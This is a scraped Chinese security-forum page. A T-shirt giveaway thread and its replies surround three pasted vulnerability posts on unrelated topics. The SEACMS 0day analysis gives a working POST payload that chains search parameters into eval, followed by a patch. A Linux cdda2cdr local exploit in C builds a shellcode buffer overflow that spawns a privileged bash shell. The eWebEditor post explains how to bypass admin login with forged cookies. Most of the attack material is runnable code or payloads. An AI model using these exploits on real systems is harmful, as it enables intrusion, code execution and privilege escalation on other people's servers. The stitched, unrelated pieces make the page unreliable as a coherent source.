最近看过此主题的会员

返回列表 发帖

非安全十周年文化衫免费发布噢!

本帖最后由 legend 于 2016-8-4 17:14 编辑

T恤颜色及数量

十周年分黑白款男女款和经典五周年庆纪念款共两百件

特别说明:大码照顾体量大的朋友,90KG也能穿

另外:由于成本问题,凡参与者需要自付邮费,以邮件到付进行手续,你可以选择不参与,但是最终解释权归非安全中国所有!^_^

非安全中国网论坛或者QQ群成员具有优先申请权

每人限领一件!

体型参考:男 均码 180CM 身材亦可穿

女 均码 165CM 身材亦可穿

参加条件:将相关信息发送邮箱 [legend#sitedirsec.com](自行修改邮箱格式)

特别说明:根据录入先后顺序发货,数量有限。不一定每个人都有的噢!


=======邮件格式========

姓名周年款型号/颜色电话地址

1

评分人数

    • webmaster: 我很赞同威望 + 10 金钱 + 10 金 贡献 + 5 非安全基金 + 10 基金
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:legend发表,本帖发表者legend符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者legend和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

海洋CMS(SEACMS)0day漏洞分析
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        海洋CMS是一套专为不同需求的站长而设计的视频点播系统,在影视类CMS中具有很高的市场占有率
[/quote]
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        其官方地址是:http://www.seacms.net/
[/quote]

        海洋CMS(SEACMS)几个老漏洞及其修补方法

<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        在2017年2月,海洋CMS 6.45版本曾爆出一个前台getshell漏洞,漏洞具体内容参见:http://blog.csdn.net/qq_35078631/article/details/76595817。
[/quote]
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        该漏洞成因在于search.php没有对用户输入内容进行过滤,导致攻击者提交的order参数可进入parseIf函数中执行eval。  
[/quote]
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        官方在6.46版中修复了该漏洞,修复方法是对用户输入的参数进行过滤并限制长度为20个字符。
[/quote]
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        但这种修复方法并没有完全修复漏洞,因为在替换操作过程中用户输入的几个参数可以进行组合,因此补丁被绕过。  
[/quote]
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        随后官方又在8月7日发布了6.54版本再次修复漏洞,这次修复增加了一句:
[/quote]

$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";


<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        即限制了order参数只能是固定内容,这样虽然避免了通过order参数进行的攻击,但是却没有解决其他参数进入parseIf函数的问题。
[/quote]

        海洋CMS(SEACMS)0day漏洞分析

<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        我们抓取到的攻击payload(POC)如下:
[/quote]

POST /search.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Connection: keep-alive
Upgrade-Insecure-Requests: 1 searchtype=5&amp;searchword={if{searchpage:year}&amp;year=:e{searchpage:area}}&amp;area=v{searchpage:letter}&amp;letter=al{searchpage:lang}&amp;yuyan=(join{searchpage:jq}&amp;jq=($_P{searchpage:ver}&amp;&amp;ver=OST[9]))&amp;9[]=ph&amp;9[]=pinfo();


<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        可以看到,攻击入口已经不在是order参数,我们来看一下search.php中的搜索实现过程:
[/quote]

function echoSearchPage() {
......
    $content = str_replace("{searchpage:page}",$page,$content);
            $content = str_replace("{seacms:searchword}",$searchword,$content);
    $content = str_replace("{seacms:searchnum}",$TotalResult,$content);
            $content = str_replace("{searchpage:ordername}",$order,$content);
......
    $content = str_replace("{searchpage:year}",$year,$content);
            $content = str_replace("{searchpage:area}",$area,$content);
    $content = str_replace("{searchpage:letter}",$letter,$content);
            $content = str_replace("{searchpage:lang}",$yuyan,$content);
    $content = str_replace("{searchpage:jq}",$jq,$content);
    ......
            $content = str_replace("{searchpage:state}",$state2,$content);
    $content = str_replace("{searchpage:money}",$money2,$content);
            $content = str_replace("{searchpage:ver}",$ver,$content);
......
    $content=$mainClassObj->parseIf($content);


<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        可以看到,代码中对html中的searchpage标签进行了多次替换,而攻击者也正是利用了这一点,在多次替换过程中使多个参数共同组合成最终的payload,
[/quote]
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        这样既绕开了RemoveXSS的过滤又绕过了20字节的长度限制。  
在对参数进行了替换之后,content中已经包含了如下攻击payload:
[/quote]

if:eval(join($_POST[9]))


<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        在随后的POST数据中攻击者又利用9[]把真正的payload利用base64_decode传入。最终$content内容被传入parseIf函数。
[/quote]
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        在parseIf函数中判断含有if:标签,就会调用eval来执行该内容,从而导致了攻击者的payload被执行。
[/quote]

function parseIf($content){ if (strpos($content,'{if:')=== false){ return $content;
                    }else{
......
                    @eval("if(".$strIf."){$ifFlag=true;}else{$ifFlag=false;}");


        漏洞修复

<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        根据云锁监测,目前该0day已经被大规模运用,而且攻击者使用自动化攻击脚本对全网SEACMS进行搜索并实施自动攻击。
[/quote]
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        我们已在9月份向CNVD和厂商报告了漏洞详情,但截至2017.10.9,SEACMS仍然未发布该漏洞的补丁。
[/quote]
<p style="font-size:15px;color:#585858;font-family:微软雅黑;background-color:#FFFFFF;">
        建议SEACMS用户立即安装云锁并开启文件防上传功能,可暂时避免被自动化程序攻击。或在echoSearchPage()函数中增加一条过滤语句:
[/quote]

if(strpos($searchword,'{searchpage:')) exit;




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Linux x86 cdda2cdr local disk exploit
cat > /tmp/cdda2x.c <<EOF
/**
** Linux x86 cdda2cdr local disk exploit
** gcc -o inj3ct0r inj3ct0r.c inj3ct0r <offset> <bufsiz>
**/
#include <stdlib.h>
#include <stdio.h>
char exec[]= /* Generic Linux x86 running our /tmp program */
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/tmp/cd";
#define LEN 500
#define NOP 0x90
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
void main(int argc, char *argv[]) {
int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];
if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer
", argv[0]);
exit(0);
}
else if (argc == 2){
   offset=atoi(argv[1]);
}
else if (argc == 3) {
   offset=atoi(argv[1]);
   buflen=atoi(argv[2]);
}
else {
   offset=500;
   buflen=500;
}
addr=get_sp();
fprintf(stderr, "Linux x86 cdda2cdr local disk exploit
");
fprintf(stderr, "Using addr: 0x%x
", addr+offset);
memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),exec,strlen(exec));
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
*(int *)&amp;buf=addr+offset;
execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);
/*
for (i=0; i < strlen(buf); i++) putchar(buf);
*/
}
EOF
cat > /tmp/cd.c <<EOF
void main() {
    setregid(getegid(), getegid());
    system("/bin/bash");
}
EOF
gcc -o /tmp/cd /tmp/cd.c
gcc -o /tmp/cdda2x /tmp/cdda2x.c
echo "Note that gid=6 leads to easy root access.."
/tmp/cdda2x


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

ewebeditor php&asp版本后台认证漏洞
发布时间:2009-12-12
影响版本:php v3.8/asp v2.8
漏洞描述:eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
../ewebeditor/admin/config.php文件
用户认证方式存在严重的安全漏洞,可以直接跳过认证获取到管理员权限。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.
这时候你清空浏览器的url,然后输入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php
哈哈,直接进去了,利用和asp一样,新增样式修改上传,就ok了




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

滴 父亲卡

TOP

让大家期待已久的T恤,,,马上就可以领了。

    不想说了,赶快上车吧。

TOP

TOP

回复 2# achitaka


   上面不是写很清楚么?

TOP

邮件发给谁

TOP

返回列表